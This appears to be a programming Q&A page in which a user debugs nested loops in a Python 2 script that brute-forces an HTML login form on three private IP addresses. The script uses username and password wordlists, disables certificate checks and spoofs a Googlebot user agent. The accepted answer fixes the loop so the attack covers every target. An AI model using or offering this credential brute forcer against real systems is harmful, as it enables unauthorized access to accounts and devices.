Search code examples
pythonnested-loops

Three nested for loops in python fail

I am trying to write a HTML Form brute forcer with three Nested For loops, one for IP one for USER and one for PASSWORDS, however my code tries all correct user:pass combinations for the first IP address, write three times the found one and then fails. I would like to try all user:pass combinations for all the three IP addresses. Here is the code:

import ssl
import base64
import sys
import urllib
import urllib2
import socket
ssl._create_default_https_context = ssl._create_unverified_context
if len(sys.argv) !=4:
        print "usage: %s userlist passwordlist" % (sys.argv[0])
        sys.exit(0)
filename1=str(sys.argv[1])
filename2=str(sys.argv[2])
#filename3=str(sys.argv[3])
userlist = open(filename1,'r')
passwordlist = open(filename2,'r')
#targets = open(filename3,'r')
targets = ['192.168.2.1', '192.168.2.1', '192.168.2.2']

#url = "https://192.168.2.1:8443/login.cgi"
foundusers = []
foundcreds = []
OkStr="url=index.asp"
headers = {}
headers['User-Agent'] = "Googlebot"
i=0
for ip in targets:
        url = "https://"+ip.rstrip()+":8443/login.cgi"
        for user in userlist.readlines():
                for password in passwordlist.readlines():
                        credentials=base64.b64encode(user.rstrip()+':'+password.rstrip())
                        #print "trying "+user.rstrip()+':'+password.rstrip()
                        data = urllib.urlencode({'login_authorization': credentials})
                        try:
                                req = urllib2.Request(url, data, headers=headers)
                                request = urllib2.urlopen(req, timeout = 3)
                                response = request.read()
                                print 'ip=%r user=%r password=%r' % (ip, user, password)  
                                #print "[%d]" % (request.code)
                                if (response.find(OkStr)>0):
                                        foundcreds.append(user.rstrip()+':'+password.rstrip())
                                request.close()
                        except urllib2.HTTPError, e:
                                print "[-] Error = "+str(e)
                                pass
                        except socket.timeout, e:
                                print "[-] Error = "+str(e)
                                pass
                        except ssl.SSLError, e:
                                print "[-] Error = "+str(e)
                                pass
                        except urllib2.URLError, e :
                                print "[-] Error = "+str(e)
                                pass                                                

        if len(foundcreds)>0:
                print "Found User and Password combinations:\n"
                for name in foundcreds:
                        print name+"\n"
        else:
                print "No users found\n"

This is the output:

ip='192.168.2.1' user='admin\n' password='asd\n'
ip='192.168.2.1' user='admin\n' password='qwer\n'
ip='192.168.2.1' user='admin\n' password='rews\n'
ip='192.168.2.1' user='admin\n' password='test\n'
Found User and Password combinations:

admin:test

Found User and Password combinations:

admin:test

Found User and Password combinations:

admin:test
Solution

  • To implement P. Brunet's suggestion, change this:

    userlist = open(filename1,'r')
passwordlist = open(filename2,'r')

    to:

    userlist = open(filename1,'r').readlines()
passwordlist = open(filename2,'r').readlines()

    then remove the .readlines() from your iterators.